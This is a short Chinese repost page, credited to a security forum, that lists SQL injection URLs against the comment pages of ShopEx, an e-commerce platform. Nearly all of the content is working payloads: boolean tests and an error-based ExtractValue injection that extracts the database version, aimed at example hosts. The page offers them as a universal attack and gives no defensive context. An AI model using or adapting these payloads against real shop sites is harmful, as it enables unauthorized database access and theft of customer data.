您的位置：首页 > 运维架构

shopex通杀注入两处

2014-11-03 19:41 495 查看

http://www.x.cn/index.php?comment-822'/**/and/**/'1'='1-ask-commentlist.html

http://www.x.com/comment-8967'/**/and/**/ExtractValue(0x64,concat(0x01,(select/**/@@version)))/**/order/**/by/**/'1-ask-commentlist.html

http://www.x.cn/index.php?comment-822'/**/and/**/'1'='1-ask-commentlist.html

http://demo.x.com.cn/485/index.php?comment-190'/**/and/**/'1'='1-ask-commentlist.html

分为开没开伪静态以及有木有屏蔽错误回显的2X2=4种情况.
转自:https://www.t00ls.net/thread-21921-1-1.html

内容来自用户分享和网络整理，不保证内容的准确性，如有侵权内容，可联系管理员处理

标签： version shopex

相关文章推荐

新的分享

章节导航